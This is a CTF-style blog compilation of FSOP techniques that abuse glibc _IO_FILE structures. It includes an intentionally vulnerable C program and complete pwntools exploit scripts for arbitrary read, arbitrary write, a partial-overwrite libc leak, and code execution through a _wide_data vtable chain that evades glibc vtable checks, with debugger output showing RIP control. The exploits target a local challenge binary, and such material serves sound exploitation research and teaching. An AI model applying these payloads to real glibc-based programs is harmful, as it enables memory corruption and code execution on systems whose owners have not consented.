Yet another FSOP compilation
Compilation of fsop techniques to gain arbitrary read/write and code execution via _IO_FILE
Attachments:
example1.c example arbread.py arbwrite.py partial_overwrite_read.py rce_widedata.py rce_widedata_variation.py
When angelboy released “Play with FILE structure”, fsop became quite popular and a lot of ctf exploits use it today. Over time we also found additional techniques that built on top of his research.
However, I often find myself searching for specific details repeatedly. So, to save future headaches, I’ve compiled the structures and techniques I use most frequently.
_IO_FILE_plus Structure
1
2
3
4
5
6
7
8
9
10
11
12
13
14
flags _IO_read_ptr
_IO_read_end _IO_read_base
_IO_write_base _IO_write_ptr
_IO_write_end _IO_buf_base
_IO_buf_end _IO_save_base
_IO_backup_base _IO_save_end
_IO_marker _chain
_fileno _flags2
XXXX _lock
_offset _codecvt
_wide_data _freeres_list
_freeres_buf __pad5
_mode _unused2
_unused2 _jmp_table
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<stdout_>: 0x00000000fbad2a84 0x00005555555592d0 flags / _IO_read_ptr
<stdout_+16>: 0x00005555555592d0 0x00005555555592d0 _IO_read_end / _IO_read_base
<stdout_+32>: 0x00005555555592d0 0x00005555555592d0 _IO_write_base / _IO_write_ptr
<stdout_+48>: 0x00005555555592d0 0x00005555555592d0 _IO_write_end / _IO_buf_base
<stdout_+64>: 0x00005555555596d0 0x0000000000000000 _IO_buf_end / _IO_save_base
<stdout_+80>: 0x0000000000000000 0x0000000000000000 _IO_backup_base / _IO_save_end
<stdout_+96>: 0x0000000000000000 0x00007ffff7e038e0 _IO_marker / _chain
<stdout_+112>: 0x0000000000000001 0xffffffffffffffff _fileno / _flags2
<stdout_+128>: 0x0000000000000000 0x00007ffff7e05710 XXXXXX / _lock
<stdout_+144>: 0xffffffffffffffff 0x0000000000000000 _offset / _codecvt
<stdout_+160>: 0x00007ffff7e037e0 0x0000000000000000 _wide_data / _freeres_list
<stdout_+176>: 0x0000000000000000 0x0000000000000000 _freeres_buf / __pad5
<stdout_+192>: 0x00000000ffffffff 0x0000000000000000 _mode / _unused2
<stdout_+208>: 0x0000000000000000 0x00007ffff7e02030 _unused2 / vtable
Exploiting _IO_FILE_plus primarily enables three primitives:
- Arbitrary Read
- Arbitrary Write
- Code Execution
Example Challenge
For these examples, we assume a primitive that allows completely overwriting stdout or stdin, along with a trigger like scanf or printf. While partial overwrites or controlling a custom file object may require some creativity, most scenarios boil down to this.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#include <stdio.h>
#include <stdlib.h>
int setup() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
return 0;
}
void show_menu() {
printf("1. read into stdout\n");
printf("2. read into stdin\n");
printf("3. scanf heap chunk\n");
printf("4. printf heap chunk\n");
printf("5. exit\n");
printf(">> ");
}
int main() {
char* chunk = malloc(0x200);
printf("system: %p\n", (void*)system);
printf("heap: %p\n\n", (void*)chunk);
while(1) {
show_menu();
int choice;
scanf("%d", &choice);
switch(choice) {
case 1:
read(0, stdout, 0x200);
break;
case 2:
read(0, stdin, 0x200);
break;
case 3:
scanf("%200s", chunk);
break;
case 4:
printf("%s\n", chunk);
break;
default:
exit(0);
}
}
free(chunk);
}
For the basic techniques, I’ll assume you have read angelboys document, which explains in more detail, how and why this works.
Arbitrary Read
To achieve an arbitrary read, we can abuse stdout buffering by modifying _IO_FILE. The requirements are:
- Set
_filenoto1. - Set
_flags &= ~_IO_NO_WRITES. - Set
_flags |= _IO_CURRENTLY_PUTTING. - Set
_IO_write_baseand_IO_write_ptrto the start of the memory to leak. - Set
_IO_read_endto_IO_write_base. - Set
_IO_lockto a writable memory address (initialized to 0).
Note:
_IO_lockneeds to be set to a writable memory address, so_IO_flush_allwill not crash.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/usr/bin/python
from pwn import *
def write_stdout(data):
r.sendline(b"1")
r.send(data)
def exploit(r):
r.recvuntil(b": ")
SYSTEM = int(r.recvline().strip(), 16)
r.recvuntil(b": ")
HEAP = int(r.recvline().strip(), 16)
r.recvuntil(b">> ")
libc.address = SYSTEM - libc.symbols["system"]
log.info("SYSTEM: 0x{:x}".format(SYSTEM))
log.info("LIBC: 0x{:x}".format(libc.address))
log.info("HEAP: 0x{:x}".format(HEAP))
FLAGS = 0
FLAGS &= ~8 # _IO_NO_WRITES
FLAGS |= 0x800 # _IO_CURRENTLY_PUTTING
FLAGS |= 0x1000 # _IO_IS_APPENDING
TARGET = libc.address
FAKE_LOCK = HEAP + 0x100
FS = p64(FLAGS) + p64(0x0000000000000000) # flags / _IO_read_ptr
FS += p64(TARGET) + p64(0x0000000000000000) # _IO_read_end / _IO_read_base
FS += p64(TARGET) + p64(TARGET+0x10) # _IO_write_base / _IO_write_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_end / _IO_buf_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_buf_end / _IO_save_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_backup_base / _IO_save_end
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_markers / _IO_chain
FS += p64(0x0000000000000001) + p64(0xffffffffffffffff) # _IO_fileno / _IO_flags2
FS += p64(0x0000000000000000) + p64(FAKE_LOCK) # _IO_lock
FS += p64(0xffffffffffffffff) + p64(0x0000000000000000) # _IO_offset / _IO_codecvt
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_wide_data / _IO_save_wide_data
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _freeres_buf / __pad5
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _mode / unused2
FS += p64(0x0000000000000000) + p64(libc.symbols["_IO_file_jumps"]) # _unused2 / vtable
write_stdout(FS)
r.interactive()
return
if __name__ == "__main__":
e = ELF("./example1")
libc = ELF("./libc.so.6")
r = process("./example1")
print(util.proc.pidof(r))
pause()
exploit(r)
(Example will also work, if you just set _IO_CURRENTLY_PUTTING).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
python3 ./arbread.py
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
[*] '/home/kileak/ctf/fsop/example1'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
[*] '/home/kileak/ctf/fsop/libc.so.6'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './example1': pid 115480
[115480]
[*] Paused (press any to continue)
[*] SYSTEM: 0x7ffff7c58750
[*] LIBC: 0x7ffff7c00000
[*] HEAP: 0x5555555592a0
[*] Switching to interactive mode
\x7fELF\x03\x00\x00\x00\x00\x00\x00\x00\x001. read into stdout
2. read into stdin
3. scanf heap chunk
4. printf heap chunk
5. exit
$
With this we just examplary read the start of libc.
Arbitrary Write
Similarly, we can achieve an arbitrary write by modifying _IO_FILE:
- Set
_filenotostdin(0). - Set
_flags &= ~_IO_NO_READS. - Set
_IO_read_base=_IO_read_ptr= 0. - Set
_IO_buf_base=_IO_buf_end=target_address. - Ensure
_IO_buf_end-_IO_buf_base> size of input. - Set
_IO_lockto a writable memory address.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/python
from pwn import *
def write_stdin(data):
r.sendline(b"2")
r.send(data)
r.recvuntil(b">> ")
def scanf_heap(data):
r.sendline(b"3")
r.sendline(data)
r.recvuntil(b">> ")
def exploit(r):
r.recvuntil(b": ")
SYSTEM = int(r.recvline().strip(), 16)
r.recvuntil(b": ")
HEAP = int(r.recvline().strip(), 16)
r.recvuntil(b">> ")
libc.address = SYSTEM - libc.symbols["system"]
log.info("SYSTEM: 0x{:x}".format(SYSTEM))
log.info("LIBC: 0x{:x}".format(libc.address))
log.info("HEAP: 0x{:x}".format(HEAP))
FLAGS = 0
FLAGS &= ~4 # _IO_NO_READS
TARGET = HEAP + 0x200 # pointing to top
FAKE_LOCK = HEAP + 0x100
FS = p64(FLAGS) + p64(0x0000000000000000) # flags / _IO_read_ptr
FS += p64(0x0) + p64(0x0000000000000000) # _IO_read_end / _IO_read_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_base / _IO_write_ptr
FS += p64(0x0000000000000000) + p64(TARGET) # _IO_write_end / _IO_buf_base
FS += p64(TARGET+0x100) + p64(0x0000000000000000) # _IO_buf_end / _IO_save_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_backup_base / _IO_save_end
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_markers / _IO_chain
FS += p64(0x0000000000000000) + p64(0xffffffffffffffff) # _IO_fileno / _IO_flags2
FS += p64(0x0000000000000000) + p64(FAKE_LOCK) # _IO_lock
FS += p64(0xffffffffffffffff) + p64(0x0000000000000000) # _IO_offset / _IO_codecvt
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_wide_data / _IO_save_wide_data
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _freeres_buf / __pad5
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _mode / unused2
FS += p64(0x0000000000000000) + p64(libc.symbols["_IO_file_jumps"]) # _unused2 / vtable
write_stdin(FS)
scanf_heap(b"XXXXXXXX" + p64(0xffffffffffffffff))
r.interactive()
return
if __name__ == "__main__":
e = ELF("./example1")
libc = ELF("./libc.so.6")
r = process("./example1")
print(util.proc.pidof(r))
pause()
exploit(r)
scanf will now read the data into our heap chunk at 0x5555555592a0 but use our fake _buf_base for buffering and thus also writing the data there (in this example overwriting top)
1
2
3
4
5
6
7
8
9
gef➤ x/30gx 0x5555555592a0
0x5555555592a0: 0x5858585858585858 0xffffffffffffffff # heap chunk
0x5555555592b0: 0x0000000000000000 0x0000000000000000
0x5555555592c0: 0x0000000000000000 0x0000000000000000
gef➤ x/30gx 0x5555555594a0
0x5555555594a0: 0x5858585858585858 0xffffffffffffffff # heap top
0x5555555594b0: 0x000000000000000a 0x0000000000000000
0x5555555594c0: 0x0000000000000000 0x0000000000000000
Bypassing vtable Checks for Code Execution
Newer glibc versions introduced vtable verification, preventing the use of arbitrary vtable pointers for code execution. However, we can move the vtable pointer within the valid region to invoke unexpected functions. This can lead to chains that eventually call unchecked vtable entries, which we may control.
There are many ways to find such function chains by analyzing the glibc source code for file operations. While many get patched over time, let’s look at ones that still work (as of glibc-2.39).
Code Execution via _wide_data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */
__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;
wchar_t _shortbuf[1];
const struct _IO_jump_t *_wide_vtable;
};
The _wide_data structure opens up several techniques for code execution.
While doing a more constrained challenge recently, i found this chain, which turned out quite useful:
_IO_wdefault_xsgetn => __wunderflow => _IO_switch_to_wget_mode => _IO_WOVERFLOW
1
2
3
4
5
6
7
8
9
10
11
12
13
size_t _IO_wdefault_xsgetn(FILE *fp, void *data, size_t n) {
// ...
for (;;) {
ssize_t count = fp->_wide_data->_IO_read_end - fp->_wide_data->_IO_read_ptr;
if (count > 0) {
/* unwanted branch */
}
if (n == 0 || __wunderflow(fp) == WEOF) break;
}
return -n;
}
If count is 0 (which happens when _wide_data->_IO_read_end equals _wide_data->_IO_read_ptr), __wunderflow is called.
1
2
3
4
5
6
7
8
9
10
11
12
13
wint_t __wunderflow(FILE *fp) {
if (fp->_mode < 0 || (fp->_mode == 0 && _IO_fwide(fp, 1) != 1))
return WEOF;
if (fp->_mode == 0)
_IO_fwide(fp, 1);
if (_IO_in_put_mode(fp))
if (_IO_switch_to_wget_mode(fp) == EOF)
return WEOF;
// ...
}
If fp->mode != 0 and fp->flags & 0x800 (_IO_CURRENTLY_PUTTING), this will call _IO_switch_to_wget_mode
1
2
3
4
5
6
int _IO_switch_to_wget_mode(FILE *fp) {
if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
if ((wint_t)_IO_WOVERFLOW(fp, WEOF) == WEOF)
return EOF;
// ...
}
_IO_WOVERFLOW is a macro to
1
2
3
4
5
6
#define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
#define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
#define _IO_WIDE_JUMPS(THIS) \
_IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable
Thus, it calls __overflow from wide_data->wide_vtable, which is not subject to vtable verification.
We just need to satisfy the following constraints:
_flags & 0x800fp->_mode != 0_wide_data->_IO_read_end == _wide_data->_IO_read_ptr(calls__wunderflow)_wide_data->_IO_write_ptr > _wide_data->_IO_write_base(calls_IO_WOVERFLOW)- Control over
_wide_data
If met, _IO_WOVERFLOW will use the wide vtable, which we fully control.
To clarify the concept, the example exploit separates the _IO_FILE structure, wide_data, and wide_vtable.
The nice thing with this chain is that we could also pack everything into a single _IO_FILE structure using overlapping offsets, which is useful when the write primitive is limited.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/python
from pwn import *
def write_stdout(data):
r.sendline(b"1")
r.send(data)
def exploit(r):
r.recvuntil(b": ")
SYSTEM = int(r.recvline().strip(), 16)
r.recvuntil(b": ")
HEAP = int(r.recvline().strip(), 16)
r.recvuntil(b">> ")
libc.address = SYSTEM - libc.symbols["system"]
log.info("SYSTEM: 0x{:x}".format(SYSTEM))
log.info("LIBC: 0x{:x}".format(libc.address))
log.info("HEAP: 0x{:x}".format(HEAP))
FLAGS = 0x00000000fbad0800
FAKE_LOCK = HEAP + 0x100
# trigger _IO_wdefault_xsgetn in _IO_flush_all
FAKE_VTABLE = libc.symbols["_IO_file_jumps"] - 0x68 - 0x18
FAKE_WIDE_DATA = libc.symbols["_IO_2_1_stdout_"] + 0xe0
FAKE_WIDE_VTABLE = FAKE_WIDE_DATA + 0xf0
# overwrite _mode with 1 and point vtable, so _IO_wdefault_xsgetn will be called in _IO_flush_all
FS = p64(FLAGS) + p64(0x0000000000000000) # flags / _IO_read_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_read_end / _IO_read_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_base / _IO_write_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_end / _IO_buf_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_buf_end / _IO_save_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_backup_base / _IO_save_end
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_markers / _IO_chain
FS += p64(0x0000000000000001) + p64(0xffffffffffffffff) # _IO_fileno / _IO_flags2
FS += p64(0x0000000000000000) + p64(FAKE_LOCK) # _IO_lock
FS += p64(0xffffffffffffffff) + p64(0x0000000000000000) # _IO_offset / _IO_codecvt
FS += p64(FAKE_WIDE_DATA) + p64(0x0000000000000000) # _IO_wide_data / _IO_save_wide_data
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _freeres_buf / __pad5
FS += p64(0x0000000000000001) + p64(0x0000000000000000) # _mode / unused2
FS += p64(0x0000000000000000) + p64(FAKE_VTABLE) # _unused2 / vtable
# forge wide_data, so that __wunderflow -> _IO_switch_to_wget_mode will be called
wide_data = p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_read_ptr / IO_read_end
wide_data += p64(0x0000000000000000) + p64(0x0000000000000100) # _IO_read_base / _IO_write_base
wide_data += p64(0x0000000000000400) + p64(0x0000000000000000) # _IO_write_ptr / _IO_write_end
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_buf_base / _IO_buf_end
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_save_base / _IO_backup_base
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_save_end
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
wide_data += p64(0x0000000000000000) + p64(0x0000000000000000)
wide_data += p64(FAKE_WIDE_VTABLE) + p64(0x0000000000000000) # wide_data.vtable
# _IO_WOVERFLOW will call vtable+0x18
wide_vtable = p64(0x0000000000000000) + p64(0x0000000000000000)
wide_vtable += p64(0x0000000000000000) + p64(0xdeadbeef) # X / __overflow
payload = FS + wide_data + wide_vtable
write_stdout(payload)
r.interactive()
return
if __name__ == "__main__":
e = ELF("./example1")
libc = ELF("./libc.so.6")
r = process("./example1")
print(util.proc.pidof(r))
pause()
exploit(r)
This will satisfy all the constraints and when exiting the challenge, it will trigger the chain in _IO_flush_all resulting in:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x00007ffff7e04790 → 0x0000000000000000
$rbx : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rcx : 0x1
$rdx : 0x400
$rsp : 0x00007fffffffd208 → 0x00007ffff7c8afe0 → <_IO_switch_to_wget_mode+0030> cmp eax, 0xffffffff
$rbp : 0x00007fffffffd220 → 0x00007fffffffd260 → 0x00007fffffffd2e0 → 0x00007fffffffd360 → 0x00007fffffffd3c0 → 0x00007fffffffd3d0 → 0x00007fffffffd400 → 0x00007fffffffd4a0
$rsi : 0xffffffff
$rdi : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rip : 0xdeadbeef
$r8 : 0x00007fffffffd310 → 0x00000001ffffd320
$r9 : 0x0
$r10 : 0x00007fffffffd29f → 0x007fffffffd2b000
$r11 : 0x00007fffffffd2a0 → 0x00007fffffffd2b0 → 0x00007fffffffd2e0 → 0x00007fffffffd360 → 0x00007fffffffd3c0 → 0x00007fffffffd3d0 → 0x00007fffffffd400 → 0x00007fffffffd4a0
$r12 : 0xffffffff
$r13 : 0xd0
$r14 : 0x00007ffff7e045c0 → 0x00000000fbad0800
$r15 : 0x00007ffff7e056f0 → 0x0000000000000001
$eflags: [zero CARRY PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffd208│+0x0000: 0x00007ffff7c8afe0 → <_IO_switch_to_wget_mode+0030> cmp eax, 0xffffffff ← $rsp
0x00007fffffffd210│+0x0008: 0x00007fffffffd2e0 → 0x00007fffffffd360 → 0x00007fffffffd3c0 → 0x00007fffffffd3d0 → 0x00007fffffffd400 → 0x00007fffffffd4a0 → 0x00007fffffffd500
0x00007fffffffd218│+0x0010: 0x00000000000000d0
0x00007fffffffd220│+0x0018: 0x00007fffffffd260 → 0x00007fffffffd2e0 → 0x00007fffffffd360 → 0x00007fffffffd3c0 → 0x00007fffffffd3d0 → 0x00007fffffffd400 → 0x00007fffffffd4a0 ← $rbp
0x00007fffffffd228│+0x0020: 0x00007ffff7c8b533 → <_IO_wdefault_xsgetn+0203> cmp eax, 0xffffffff
0x00007fffffffd230│+0x0028: 0x00007ffff7fbd160 → 0x00007ffff7c00000 → 0x03010102464c457f
0x00007fffffffd238│+0x0030: 0x00007ffff7e045c0 → 0x00000000fbad0800
0x00007fffffffd240│+0x0038: 0x0000000000000000
Here we control rip, rdi (_IO_FILE struct/stdout), and rdx (_widedata._IO_write_ptr).
In newer glibc versions, setcontext uses rdx instead of rdi for setting the new stack pointer. This handles both cases and enables easy stack pivoting via setcontext again.
Variations with Limited Control
Building on these techniques, there are several variations. For instance, partial overwrites of existing _IO_FILE addresses can provide leaks when none exist, or overwriting buffer end pointers can enable large writes into libc.
Partial Overwrite for Leaks
If we lack the leaks required to fully control the _IO_FILE struct, a partial overwrite can often trigger a huge leak.
1
2
3
4
5
6
7
8
FLAGS = 0
FLAGS &= ~8 # _IO_NO_WRITES
FLAGS |= 0x800 # _IO_CURRENTLY_PUTTING
FLAGS |= 0x1000 # _IO_IS_APPENDING
FS = p64(FLAGS) + p64(0x0000000000000000) # flags / _IO_read_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_read_end / _IO_read_base
FS += p16(0x0) # _IO_write_base (partial overwrite)
1
2
3
0x7ffff7e045c0 <_IO_2_1_stdout_>: 0x0000000000001800 0x0000000000000000
0x7ffff7e045d0 <_IO_2_1_stdout_+16>: 0x0000000000000000 0x0000000000000000
0x7ffff7e045e0 <_IO_2_1_stdout_+32>: 0x00007ffff7e00000 0x00007ffff7e04644
This will often be enough to trigger a huge leak containing a lot of libc addresses, which can then be used for further exploiting.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/python
from pwn import *
def write_stdout(data):
r.sendline(b"1")
r.send(data)
def exploit(r):
r.recvuntil(b">> ")
FLAGS = 0
FLAGS &= ~8 # _IO_NO_WRITES
FLAGS |= 0x800 # _IO_CURRENTLY_PUTTING
FLAGS |= 0x1000 # _IO_IS_APPENDING
FS = p64(FLAGS) + p64(0x0000000000000000) # flags / _IO_read_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_read_end / _IO_read_base
FS += p16(0x0) # _IO_write_base (partial overwrite)
write_stdout(FS)
LEAK = r.recv(0x1000)
print(hexdump(LEAK))
r.interactive()
return
if __name__ == "__main__":
r = process("./example1")
print(util.proc.pidof(r))
pause()
exploit(r)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
[*] '/home/kileak/ctf/fsop/example1'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
[*] '/home/kileak/ctf/fsop/libc.so.6'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[x] Starting local process './example1'
[+] Starting local process './example1': pid 303571
[303571]
[*] Paused (press enter to continue)
00000000 32 00 00 00 00 00 00 00 33 00 00 00 00 00 00 00 │2···│····│3···│····│
00000010 34 00 00 00 00 00 00 00 35 00 00 00 00 00 00 00 │4···│····│5···│····│
00000020 36 00 00 00 00 00 00 00 37 00 00 00 00 00 00 00 │6···│····│7···│····│
00000030 38 00 00 00 00 00 00 00 39 00 00 00 00 00 00 00 │8···│····│9···│····│
00000040 7b 06 00 00 00 00 00 00 a0 d4 db f7 ff 7f 00 00 │{···│····│····│····│
00000050 c0 a0 db f7 ff 7f 00 00 c0 86 db f7 ff 7f 00 00 │····│····│····│····│
00000060 c0 2a db f7 ff 7f 00 00 01 00 00 00 00 00 00 00 │·*··│····│····│····│
00000070 e8 5e dd f7 ff 7f 00 00 00 00 00 00 00 00 00 00 │·^··│····│····│····│
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000090 00 00 00 00 00 00 00 00 80 17 db f7 ff 7f 00 00 │····│····│····│····│
000000a0 20 17 db f7 ff 7f 00 00 c0 16 db f7 ff 7f 00 00 │ ···│····│····│····│
000000b0 60 16 db f7 ff 7f 00 00 00 16 db f7 ff 7f 00 00 │`···│····│····│····│
000000c0 a0 15 db f7 ff 7f 00 00 40 15 db f7 ff 7f 00 00 │····│····│@···│····│
000000d0 e0 14 db f7 ff 7f 00 00 80 14 db f7 ff 7f 00 00 │····│····│····│····│
000000e0 20 14 db f7 ff 7f 00 00 c0 13 db f7 ff 7f 00 00 │ ···│····│····│····│
000000f0 60 13 db f7 ff 7f 00 00 80 12 db f7 ff 7f 00 00 │`···│····│····│····│
00000100 c0 11 db f7 ff 7f 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000110 e0 14 e0 f7 ff 7f 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000120 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
...
Smaller write primitive
Assume we are limited in the write to the _IO_FILE struct (0xe0 bytes or less).
We can still achieve RCE via _IO_OVERFLOW by using the available space more efficiently.
Consider the base structure used for overwriting stdout:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
FS = p64(FLAGS) + p64(0x0000000000000000) # flags / _IO_read_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_read_end / _IO_read_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_base / _IO_write_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_end / _IO_buf_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_buf_end / _IO_save_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_backup_base / _IO_save_end
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_markers / _IO_chain
FS += p64(0x0000000000000001) + p64(0xffffffffffffffff) # _IO_fileno / _IO_flags2
FS += p64(0x0000000000000000) + p64(FAKE_LOCK) # _IO_lock
FS += p64(0xffffffffffffffff) + p64(0x0000000000000000) # _IO_offset / _IO_codecvt
FS += p64(FAKE_WIDE_DATA) + p64(0x0000000000000000) # _IO_wide_data / _IO_save_wide_data
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _freeres_buf / __pad5
FS += p64(0x0000000000000001) + p64(0x0000000000000000) # _mode / unused2
FS += p64(0x0000000000000000) + p64(FAKE_VTABLE) # _unused2 / vtable
To fulfill _wide_data->_IO_read_end == _wide_data->_IO_read_ptr we need the start of _wide_data to contain two equal values.
Inspecting the memory before _IO_2_1_stdout, we can see
1
2
3
4
5
gef➤ x/30gx 0x7ffff7e045c0-0x18
0x7ffff7e045a8 <_IO_2_1_stderr_+200>: 0x0000000000000000 0x0000000000000000 # fake wide_data
0x7ffff7e045b8 <_IO_2_1_stderr_+216>: 0x00007ffff7e02030 0x00000000fbad0800 # stderr.vtable / stdout.flags
0x7ffff7e045c8 <_IO_2_1_stdout_+8>: 0x0000000000000000 0x0000000000000000
0x7ffff7e045d8 <_IO_2_1_stdout_+24>: 0x0000000000000000 0x0000000000000000
Pointing _wide_data to stdout-0x18 causes those two addresses to be interpreted as _wide_data->_IO_read_ptr and _wide_data->_IO_read_end. Since both are 0, that constraint is already met.
Next, we need _wide_data->_IO_write_ptr > _wide_data->_IO_write_base. With this setup, _IO_write_base maps to stdout.flags, and stdout._IO_read_ptr maps to _wide_data->_IO_write_ptr. We simply need to write a value larger than _flags to satisfy this.
Pointing _wide_data 0x18 bytes before stdout has the added benefit that _wide_data->wide_vtable also fits into stdout (it will go into stdout._unused2)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
FAKE_VTABLE = libc.symbols["_IO_file_jumps"] - 0x68 - 0x18
FAKE_WIDE_DATA = libc.symbols["_IO_2_1_stdout_"] -0x18
FAKE_WIDE_VTABLE = libc.symbols["_IO_2_1_stdout_"]
FS = p64(FLAGS) + p64(FLAGS+0x200) # flags / _IO_read_ptr
FS += p64(0x0000000000000000) + p64(0xdeadbeef) # _IO_read_end / _IO_read_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_base / _IO_write_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_end / _IO_buf_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_buf_end / _IO_save_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_backup_base / _IO_save_end
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_markers / _IO_chain
FS += p64(0x0000000000000001) + p64(0xffffffffffffffff) # _IO_fileno / _IO_flags2
